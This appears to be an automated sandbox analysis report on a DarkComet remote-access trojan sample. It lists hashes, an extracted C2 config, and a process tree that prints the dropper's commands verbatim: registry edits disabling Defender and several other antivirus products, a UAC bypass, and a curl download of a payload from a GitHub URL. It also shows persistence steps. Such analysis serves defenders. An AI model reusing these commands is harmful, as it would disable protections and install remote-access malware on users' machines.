Analysis
-
max time kernel
150s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system -
submitted
15-03-2023 11:34
Static task
static1
Behavioral task
behavioral1
Sample
6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
Resource
win7-20230220-en
General
-
Target
6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe
-
Size
142KB
-
MD5
824247ace17fdb122110cf96aba85484
-
SHA1
8b6a758d3fef912321d127c3a9da0a77af8e574e
-
SHA256
e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
-
SHA512
5d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715
-
SSDEEP
3072:d7DhdC6kzWypvaQ0FxyNTBfNU/JMQNX1j8KCOdW6m1cTxotQX:dBlkZvaF4NTB1U/JM8XaOdW6miTEQX
Malware Config
Extracted
darkcomet
Microsoft
mafafa9090-59805.portmap.io:59805
DC_MUTEX-SYYFNJW
-
InstallPath
Microsoft.exe
-
gencode
PCo28LJinyik
-
install
true
-
offline_keylogger
false
-
persistence
true
-
reg_key
Microsoft
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
program.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit = "C:\\Windows\\system32\\userinit.exe,C:\\Windows\\system32\\Microsoft.exe" program.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" reg.exe -
Processes:
reg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp = "0" reg.exe -
Disables RegEdit via registry modification 1 IoCs
Processes:
Microsoft.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Microsoft.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid process 360 attrib.exe 3904 attrib.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
program.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation program.exe -
Drops startup file 4 IoCs
Processes:
powershell.execmd.exeattrib.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe attrib.exe -
Executes dropped EXE 2 IoCs
Processes:
program.exeMicrosoft.exepid process 3736 program.exe 2116 Microsoft.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
program.exeMicrosoft.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe" program.exe Set value (str) \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft = "C:\\Windows\\system32\\Microsoft.exe" Microsoft.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
program.exedescription ioc process File created C:\Windows\SysWOW64\Microsoft.exe program.exe File opened for modification C:\Windows\SysWOW64\Microsoft.exe program.exe File opened for modification C:\Windows\SysWOW64\ program.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
program.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ program.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3256 powershell.exe 3256 powershell.exe 636 powershell.exe 636 powershell.exe 4248 powershell.exe 4248 powershell.exe -
Suspicious use of AdjustPrivilegeToken 51 IoCs
Processes:
powershell.exepowershell.exepowershell.exeprogram.exeMicrosoft.exedescription pid process Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 636 powershell.exe Token: SeDebugPrivilege 4248 powershell.exe Token: SeIncreaseQuotaPrivilege 3736 program.exe Token: SeSecurityPrivilege 3736 program.exe Token: SeTakeOwnershipPrivilege 3736 program.exe Token: SeLoadDriverPrivilege 3736 program.exe Token: SeSystemProfilePrivilege 3736 program.exe Token: SeSystemtimePrivilege 3736 program.exe Token: SeProfSingleProcessPrivilege 3736 program.exe Token: SeIncBasePriorityPrivilege 3736 program.exe Token: SeCreatePagefilePrivilege 3736 program.exe Token: SeBackupPrivilege 3736 program.exe Token: SeRestorePrivilege 3736 program.exe Token: SeShutdownPrivilege 3736 program.exe Token: SeDebugPrivilege 3736 program.exe Token: SeSystemEnvironmentPrivilege 3736 program.exe Token: SeChangeNotifyPrivilege 3736 program.exe Token: SeRemoteShutdownPrivilege 3736 program.exe Token: SeUndockPrivilege 3736 program.exe Token: SeManageVolumePrivilege 3736 program.exe Token: SeImpersonatePrivilege 3736 program.exe Token: SeCreateGlobalPrivilege 3736 program.exe Token: 33 3736 program.exe Token: 34 3736 program.exe Token: 35 3736 program.exe Token: 36 3736 program.exe Token: SeIncreaseQuotaPrivilege 2116 Microsoft.exe Token: SeSecurityPrivilege 2116 Microsoft.exe Token: SeTakeOwnershipPrivilege 2116 Microsoft.exe Token: SeLoadDriverPrivilege 2116 Microsoft.exe Token: SeSystemProfilePrivilege 2116 Microsoft.exe Token: SeSystemtimePrivilege 2116 Microsoft.exe Token: SeProfSingleProcessPrivilege 2116 Microsoft.exe Token: SeIncBasePriorityPrivilege 2116 Microsoft.exe Token: SeCreatePagefilePrivilege 2116 Microsoft.exe Token: SeBackupPrivilege 2116 Microsoft.exe Token: SeRestorePrivilege 2116 Microsoft.exe Token: SeShutdownPrivilege 2116 Microsoft.exe Token: SeDebugPrivilege 2116 Microsoft.exe Token: SeSystemEnvironmentPrivilege 2116 Microsoft.exe Token: SeChangeNotifyPrivilege 2116 Microsoft.exe Token: SeRemoteShutdownPrivilege 2116 Microsoft.exe Token: SeUndockPrivilege 2116 Microsoft.exe Token: SeManageVolumePrivilege 2116 Microsoft.exe Token: SeImpersonatePrivilege 2116 Microsoft.exe Token: SeCreateGlobalPrivilege 2116 Microsoft.exe Token: 33 2116 Microsoft.exe Token: 34 2116 Microsoft.exe Token: 35 2116 Microsoft.exe Token: 36 2116 Microsoft.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.execmd.exenet.exedescription pid process target process PID 2060 wrote to memory of 1616 2060 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe cmd.exe PID 2060 wrote to memory of 1616 2060 6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe cmd.exe PID 1616 wrote to memory of 1060 1616 cmd.exe net.exe PID 1616 wrote to memory of 1060 1616 cmd.exe net.exe PID 1060 wrote to memory of 1376 1060 net.exe net1.exe PID 1060 wrote to memory of 1376 1060 net.exe net1.exe PID 1616 wrote to memory of 2372 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2372 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2880 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2880 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4132 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4132 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3696 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3696 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4456 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4456 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4576 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4576 1616 cmd.exe reg.exe PID 1616 wrote to memory of 244 1616 cmd.exe reg.exe PID 1616 wrote to memory of 244 1616 cmd.exe reg.exe PID 1616 wrote to memory of 236 1616 cmd.exe reg.exe PID 1616 wrote to memory of 236 1616 cmd.exe reg.exe PID 1616 wrote to memory of 116 1616 cmd.exe reg.exe PID 1616 wrote to memory of 116 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4948 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4948 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1996 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1996 1616 cmd.exe reg.exe PID 1616 wrote to memory of 792 1616 cmd.exe reg.exe PID 1616 wrote to memory of 792 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1956 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1956 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4752 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4752 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2172 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2172 1616 cmd.exe reg.exe PID 1616 wrote to memory of 444 1616 cmd.exe reg.exe PID 1616 wrote to memory of 444 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3888 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3888 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4152 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4152 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2108 1616 cmd.exe reg.exe PID 1616 wrote to memory of 2108 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3256 1616 cmd.exe powershell.exe PID 1616 wrote to memory of 3256 1616 cmd.exe powershell.exe PID 1616 wrote to memory of 3508 1616 cmd.exe reg.exe PID 1616 wrote to memory of 3508 1616 cmd.exe reg.exe PID 1616 wrote to memory of 696 1616 cmd.exe reg.exe PID 1616 wrote to memory of 696 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1916 1616 cmd.exe reg.exe PID 1616 wrote to memory of 1916 1616 cmd.exe reg.exe PID 1616 wrote to memory of 328 1616 cmd.exe reg.exe PID 1616 wrote to memory of 328 1616 cmd.exe reg.exe PID 1616 wrote to memory of 636 1616 cmd.exe powershell.exe PID 1616 wrote to memory of 636 1616 cmd.exe powershell.exe PID 1616 wrote to memory of 4528 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4528 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4796 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4796 1616 cmd.exe reg.exe PID 1616 wrote to memory of 5080 1616 cmd.exe reg.exe PID 1616 wrote to memory of 5080 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4864 1616 cmd.exe reg.exe PID 1616 wrote to memory of 4864 1616 cmd.exe reg.exe -
Views/modifies file attributes 1 TTPs 3 IoCs
Processes:
attrib.exeattrib.exeattrib.exepid process 360 attrib.exe 3904 attrib.exe 4632 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.bat C:\Users\Admin\AppData\Local\Temp\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"2⤵
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet session3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session4⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\AVAST Software\Avast" /v DisableAntiVirus /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\McAfee\Endpoint\AV" /v EnableOnAccessScan /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Symantec\Symantec Endpoint Protection\SMC" /v smc_enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\TrendMicro\PC-cillinNTCorp\CurrentVersion\Misc." /v AllowUnloading /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\360Safe\SafeDog" /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\KasperskyLab\protected\AVP13\settings" /v Enable /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\SecureMac" /v GlobalSwitch /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Symantec Endpoint Protection\AV" /v EnableAutoProtect /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 5 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\FeatureManagement\Overrides\0\2093230218" /v EnabledState /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-MpPreference -DisableTamperProtection $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v TamperProtection /t REG_DWORD /d 0 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Services\SecurityHealthService" /v Start /t REG_DWORD /d 4 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "4" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t REG_DWORD /d "2" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v FilterAdministratorToken /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"" /t REG_DWORD /d "0" /f3⤵
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v ""C:\Users\Admin\AppData\Local\Temp"" /t REG_DWORD /d "0" /f3⤵
- Windows security bypass
-
C:\Windows\system32\curl.execurl -L https://raw.githubusercontent.com/maxavison7/nothing/main/Microsoft.exe --output "C:\Users\Admin\AppData\Local\Temp\program.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut(\""C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\program.lnk"\"); $s.TargetPath = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.WorkingDirectory = \""C:\Users\Admin\AppData\Local\Temp"\"; $s.IconLocation = \""C:\Users\Admin\AppData\Local\Temp\program.exe"\"; $s.Save()"3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\program.exe"C:\Users\Admin\AppData\Local\Temp\program.exe"3⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\Temp\program.exe" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k attrib "C:\Users\Admin\AppData\Local\Temp" +s +h4⤵
-
C:\Windows\SysWOW64\attrib.exeattrib "C:\Users\Admin\AppData\Local\Temp" +s +h5⤵
- Sets file to hidden
- Views/modifies file attributes
-
C:\Windows\SysWOW64\Microsoft.exe"C:\Windows\system32\Microsoft.exe"4⤵
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\notepad.exenotepad5⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e907f77659a6601fcc408274894da2e
SHA19f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA51234fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5c08aea9c78561a5f00398a723fdf2925
SHA12c880cbb5d02169a86bb9517ce2a0184cb177c6e
SHA25663d2688b92da4d1bb69980b7998b9be1595dd9e53951434a9414d019c4f825a7
SHA512d30db2f55bbda7102ffe90520d233355633313dcc77cdb69a26fdbb56e59dd41793def23d69dc5dc3f94c5bd41d3c26b3628886fd2edbed2df0b332e9a21f95c
-
C:\Users\Admin\AppData\Local\Temp\8254.tmp\8265.tmp\8266.batFilesize
48KB
MD5a441547bf9949c2903a3eea35ee4da65
SHA197eda2f9d21b8e9f44d0695d73d70a406c976b99
SHA25615c7f95ef37f78ce24d32fd5bc473e8bbec4e25fe10ebf5aab9c94155326b82d
SHA5129dabae688c3a46f192363cc1bdebf53ad62fc79b966e3d32a38fc2bf02e0a6f9d2aab23a8c8d9ce00ba1b1ae22b331838032a16f8a8a5b784ef4b6a701d28a3a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5trvpclw.d2y.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\program.exeFilesize
780KB
MD5aceeb574066c69e3ef181dacc559e418
SHA11c8f6c838951c4b344e69db7cba27ab04cc48235
SHA256fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
SHA5120c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97
-
C:\Users\Admin\AppData\Local\Temp\program.exeFilesize
780KB
MD5aceeb574066c69e3ef181dacc559e418
SHA11c8f6c838951c4b344e69db7cba27ab04cc48235
SHA256fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
SHA5120c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6fsg3an241aiHcZ6Y6tN8EwqOK_OD8Kst9ngG9aGR0k.exeFilesize
142KB
MD5824247ace17fdb122110cf96aba85484
SHA18b6a758d3fef912321d127c3a9da0a77af8e574e
SHA256e9fb20dda9f6e356a21dc67a63ab4df04c2a38af8e0fc2acb7d9e01bd6864749
SHA5125d1862e383e1ff21f639842dd22126480a993a31060e50e5a102a41ecdc41077f179aec105abd084354112519cd34c89676164f43114b8c589ffd66ce918c715
-
C:\Windows\SysWOW64\Microsoft.exeFilesize
780KB
MD5aceeb574066c69e3ef181dacc559e418
SHA11c8f6c838951c4b344e69db7cba27ab04cc48235
SHA256fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
SHA5120c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97
-
C:\Windows\SysWOW64\Microsoft.exeFilesize
780KB
MD5aceeb574066c69e3ef181dacc559e418
SHA11c8f6c838951c4b344e69db7cba27ab04cc48235
SHA256fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
SHA5120c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97
-
C:\Windows\SysWOW64\Microsoft.exeFilesize
780KB
MD5aceeb574066c69e3ef181dacc559e418
SHA11c8f6c838951c4b344e69db7cba27ab04cc48235
SHA256fc9c423da251f7fb08f426f5d153fae73532cc1a3c349a040526b6bedd632c9e
SHA5120c6b8bd5e038292e064f47f35882adf43a8317ee05d052cf251c62d6dfce14f15fb240530946120b370b6fce53a7e8e3d716d32d53c9eee016b2ac2efca2eb97
-
memory/1792-243-0x00000000007B0000-0x00000000007B1000-memory.dmpFilesize
4KB
-
memory/2116-244-0x0000000002290000-0x0000000002291000-memory.dmpFilesize
4KB
-
memory/2116-246-0x0000000000400000-0x00000000004D0000-memory.dmpFilesize
832KB
-
memory/3256-147-0x000002E874730000-0x000002E874740000-memory.dmpFilesize
64KB
-
memory/3256-146-0x000002E874730000-0x000002E874740000-memory.dmpFilesize
64KB
-
memory/3256-145-0x000002E874730000-0x000002E874740000-memory.dmpFilesize
64KB
-
memory/3256-144-0x000002E85B010000-0x000002E85B032000-memory.dmpFilesize
136KB
-
memory/3736-184-0x0000000002290000-0x0000000002291000-memory.dmpFilesize
4KB
-
memory/3736-245-0x0000000000400000-0x00000000004D0000-memory.dmpFilesize
832KB
-
memory/4248-177-0x000002964E6B0000-0x000002964E6C0000-memory.dmpFilesize
64KB
-
memory/4248-174-0x000002964E6B0000-0x000002964E6C0000-memory.dmpFilesize
64KB